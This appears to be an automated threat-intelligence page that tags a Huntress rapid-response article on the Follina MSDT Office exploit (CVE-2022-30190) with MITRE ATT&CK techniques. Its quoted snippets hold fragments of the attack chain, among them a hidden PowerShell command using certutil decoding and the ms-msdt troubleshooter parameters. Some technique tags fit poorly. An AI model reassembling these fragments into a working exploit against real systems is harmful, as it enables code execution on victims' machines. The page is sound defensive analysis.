TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress

2022-05-30 · Read original ↗

ATT&CK techniques detected

14 predictions
T1203Exploitation for Client Execution
97%
“rapid response : microsoft office rce - “ follina ” msdt attack | huntress this post, as is the norm for emerging threats, is a developing article and may be subject to change as the huntress team learns more about this attack vector and new information is available. update 4 : 5…”
T1059.001PowerShell
85%
“+ ' frombase64string ( ' + [ char ] 34 + ' = = ' + [ char ] 34 + ' ) ) ' ) ) ) ) i /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. / windows / system32 / mpsigstub. exe it _ autotroubleshoot = ts _ auto \ " " ; this looks to be the crux of the exploit. using a schema for …”
T1055.001Dynamic-link Library Injection
81%
“+ ' frombase64string ( ' + [ char ] 34 + ' = = ' + [ char ] 34 + ' ) ) ' ) ) ) ) i /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. / windows / system32 / mpsigstub. exe it _ autotroubleshoot = ts _ auto \ " " ; this looks to be the crux of the exploit. using a schema for …”
T1055.001Dynamic-link Library Injection
75%
“run ’ s dynamic analysis. this was the original contents of rdf842l. html : click the image to enlarge it this html document begins with a script tag and includes a significant amount of commented a characters, which ( considering they are just comments ), would seem to serve no …”
T1055.001Dynamic-link Library Injection
73%
“exe " ; start - process $ cmd - windowstyle hidden - argumentlist " / c cd c : \ users \ public \ & & for / r % temp % % i in ( 05 - 2022 - 0438. rar ) do copy % i 1. rar / y & & findstr tvndrgaaaa 1. rar > 1. t & & certutil - decode 1. t 1. c & & expand 1. c - f : *. & & rgb. ex…”
T1204.002Malicious File
72%
“vigilant about opening any attachments. they should also be made aware that this exploit can be triggered with a hover - preview of a downloaded file that does not require any clicks ( post download ). there are additional suggestions for mitigation actions at the bottom of this …”
T1204.002Malicious File
57%
“/ msrc - blog. microsoft. com / 2022 / 05 / 30 / guidance - for - cve - 2022 - 30190 - microsoft - support - diagnostic - tool - vulnerability / - https : / / msrc. microsoft. com / update - guide / en - us / vulnerability / cve - 2022 - 30190 jump links the non - technical versi…”
T1221Template Injection
51%
“vigilant about opening any attachments. they should also be made aware that this exploit can be triggered with a hover - preview of a downloaded file that does not require any clicks ( post download ). there are additional suggestions for mitigation actions at the bottom of this …”
T1204User Execution
51%
“compressed inside the 1. c cab file ) the impact of rgb. exe specifically is unknown, but the important takeaway is that this is a novel initial access technique that readily offers threat actors code execution with just a single click — or less. this is an enticing attack for ad…”
T1204.002Malicious File
47%
“compressed inside the 1. c cab file ) the impact of rgb. exe specifically is unknown, but the important takeaway is that this is a novel initial access technique that readily offers threat actors code execution with just a single click — or less. this is an enticing attack for ad…”
T1059.001PowerShell
43%
“stepped in. rich warren shared a blog from bill demirkapi indicating there was a hardcoded buffer size for an html processing function, and we were able to confirm any files with fewer than 4096 bytes would not invoke the payload. following even more tinkering, we noticed some sy…”
T1204.002Malicious File
41%
“stepped in. rich warren shared a blog from bill demirkapi indicating there was a hardcoded buffer size for an html processing function, and we were able to confirm any files with fewer than 4096 bytes would not invoke the payload. following even more tinkering, we noticed some sy…”
T1059.001PowerShell
38%
“would execute via powershell, but spaces would break it - “. exe ” must be the last trailing string present at the end of the it _ browseforfile parameter while this is not by any means the most it could be compressed down to, we hope this shows how variants of this attack could …”
T1204.002Malicious File
31%
“would execute via powershell, but spaces would break it - “. exe ” must be the last trailing string present at the end of the it _ browseforfile parameter while this is not by any means the most it could be compressed down to, we hope this shows how variants of this attack could …”

Summary

A new attack vector enables hackers to more easily compromise users with malicious Microsoft Office documents.